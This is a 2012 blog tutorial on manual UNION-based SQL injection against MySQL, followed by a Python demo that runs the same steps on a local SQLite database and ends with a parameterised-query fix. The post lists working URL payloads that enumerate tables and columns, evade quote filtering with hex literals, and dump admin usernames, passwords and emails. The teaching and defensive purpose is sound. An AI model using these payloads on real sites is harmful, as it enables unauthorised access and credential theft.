Wednesday 6 June 2012

Hunt For SQL Injection

So what is this buzzword "SQL injection"? Most security experts use the term quite often, and even the media use it. SQL injection was the star of the news when SONY.com was hit by this common and publicly known attack method. The technique is so widespread that most website owners are fully aware of the scenario, yet they still fail to implement the required preventive measures, which eventually leads to the compromise of user data, including credit-card details and other user credentials. The latest attack on the SONY PlayStation Network and related services shows how common this flaw is, and that even industry giants can fall prey to it when a developer is negligent.

One of the major factors that gave SQL injection such wide publicity is that the method itself is very simple and can be automated to a large extent with tools like HAVIJ and SQL POISON. For this reason even novice users can run SQL injection with such a tool, obtain administrator credentials, and thereby gain illicit entry to the admin panel. These novice users, commonly known as script kiddies, can wreak havoc once they have enough privilege; most mass defacements and website spam can be seen as a direct outcome of this.

Now let me explain how to do SQL injection testing on your own website, to see whether it is really injection-proof. You don't want the bad guys doing it for you, right? So please follow the steps explained below:

STEP 1: Go to a URL that you suspect is an injection point, for example: index.php?id=1

Insert a ' (apostrophe) between = and 1:

index.php?id='1

If the page then shows a database error (for MySQL, typically "You have an error in your SQL syntax ..."), you have a likely candidate for injection. Putting the apostrophe after the value instead (id=1') breaks the query just as well. Note that a site that suppresses its error messages can still be injectable; the absence of an error is not proof of safety.

STEP 2: Now use an ORDER BY clause to find the number of columns in the query. This is how it works:

index.php?id=1 order by 1--

("--" comments out the rest of the query. MySQL requires a space after the two dashes, so in a URL write "-- " or "--+", since "+" decodes to a space.)

The page should load correctly. Now increase the number to 2 and so on until you get an SQL error.

index.php?id=1 order by 2--

No error

index.php?id=1 order by 3--

No error

index.php?id=1 order by 4--

SQL error

We got an error at 4, so we now know the query has 3 columns. Next we need to find which of those columns is actually displayed on the page.

STEP 3: Before injecting anything we need to find the vulnerable (displayed) column in the list; for this we use a UNION SELECT statement.

index.php?id=1 UNION SELECT 1,2,3--

You will probably see a number such as 1, 2 or 3 somewhere on the page. If the page still shows the original record and none of the numbers, use an id value that matches no row (a negative number, for example) so that the page displays your UNION row instead of the real one. Let us assume the number shown is 3; from now on we inject our SQL at position 3.

STEP 4: Now we can find the type and version of the database with the following query:

index.php?id=1 UNION SELECT 1,2,@@version--

This tells you the back-end database and its version, for example MySQL 5.1.x. Make sure it is MySQL 5 or later: the following steps rely on the information_schema database, which was introduced in MySQL 5.0, so they will not work on MySQL 4.

index.php?id=1 UNION SELECT 1,2,group_concat(database())--

This gives you the current database name. Let us assume "test" is our database.

STEP 5: Now let us fetch the table names:

index.php?id=1 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

This gives you a list of tables; look for something like tbl_admin, jos_users, admin etc.

STEP 6: Now to fetch the columns of a table we use the following statement:

index.php?id=1 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name_here"--

Most probably you will get an error because the quotes in the parameter are escaped or filtered (magic_quotes_gpc or addslashes). Evade this by converting the table name to its hex value and prefixing it with 0x; MySQL accepts such a hex literal as a string without any quotes.

For example, admin becomes 0x61646d696e and can be used without quotes.

From the list of columns we need to pick out only the useful ones, like username, password and email.

STEP 7: Now it is time to get the values out of the table:

index.php?id=1 UNION SELECT 1,2,group_concat(username,0x3a,password,0x3a,email) from database_name.table_name--

Wondering what 0x3a is doing there? It is the hex value of the colon character ":", used as a separator so that the fields come out readable.

Now we will have data of the form ben:xyz12:ben@xyz.com etc. In most applications the password field will hold a hash rather than the plain-text password.

That's it, you are done. Happy penetration testing, guys.
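The whole walkthrough above, as an added example that is not part of the original post: a Python script that builds a small in-memory SQLite database (constructed tables news and admin with invented rows), serves it through a function written the way the post assumes index.php is written, runs steps 1 to 7 against it, and then shows the parameterised version that the same payloads cannot touch. SQLite is used so that it runs offline; it keeps its catalogue in sqlite_master rather than information_schema, reports its version with sqlite_version() instead of @@version, and needs char(58) where MySQL accepts 0x3a. The hex-table-name trick of step 6 is MySQL-specific, so plain quotes are used for the column listing here.

```python
import sqlite3

# Constructed stand-in for the post's target: a "news" table behind
# index.php?id=N and an "admin" table holding the credentials the
# walkthrough ends up dumping.  Names and rows are invented for this example.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'first post');
INSERT INTO news VALUES (2, 'Update', 'second post');
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
INSERT INTO admin VALUES (1, 'ben', 'xyz12', 'ben@xyz.com');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def page_vulnerable(conn, id_param):
    """index.php?id=... as the post assumes it is written: the parameter is
    pasted straight into the query, so SQL inside it runs as SQL.
    Returns the rows, or the error text (a verbose error page)."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)


def page_safe(conn, id_param):
    """The fix: check the type, then bind the value as a parameter so the
    driver never lets it change the shape of the statement."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id=?", (id_value,)
    ).fetchall()


def looks_injectable(conn):
    """STEP 1: a stray apostrophe breaks the query and surfaces an error."""
    return isinstance(page_vulnerable(conn, "1'"), str)


def count_columns(conn, limit=10):
    """STEP 2: ORDER BY n until the database complains; the last n that
    worked is the number of columns in the original SELECT."""
    for n in range(1, limit + 1):
        if isinstance(page_vulnerable(conn, f"1 ORDER BY {n}--"), str):
            return n - 1
    return None


def union_fetch(conn, expr, ncols):
    """STEPS 3-7: use an id that matches nothing (-1) so the only row shown
    is our UNION row, and read the expression back from the last column."""
    cols = [str(i) for i in range(1, ncols)] + [expr]
    rows = page_vulnerable(conn, "-1 UNION SELECT " + ",".join(cols) + "--")
    return rows[0][-1] if isinstance(rows, list) and rows else None


def walkthrough(conn):
    """Steps 4 to 7 against the vulnerable page, SQLite flavour."""
    ncols = count_columns(conn)
    return {
        "version": union_fetch(conn, "sqlite_version()", ncols),
        # sqlite_master plays the role of information_schema.tables
        "tables": union_fetch(
            conn, "group_concat(name) FROM sqlite_master WHERE type='table'", ncols),
        # and its stored CREATE statement stands in for information_schema.columns
        "columns": union_fetch(conn, "sql FROM sqlite_master WHERE name='admin'", ncols),
        # char(58) is ':'; the post's 0x3a does the same job on MySQL
        "dump": union_fetch(
            conn,
            "group_concat(username||char(58)||password||char(58)||email) FROM admin",
            ncols),
    }


if __name__ == "__main__":
    db = make_db()
    print("injectable:", looks_injectable(db))
    print("columns   :", count_columns(db))
    for step, value in walkthrough(db).items():
        print(f"{step:10}: {value}")
    print("hardened  :", page_safe(db, "-1 UNION SELECT 1,2,3--"))
```

Running it prints the column count (3), the SQLite version, the table list, the CREATE statement for admin and finally ben:xyz12:ben@xyz.com, while the parameterised page returns nothing for every one of those payloads. The only difference between the two page functions is string concatenation versus a bound parameter, which is the whole fix.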
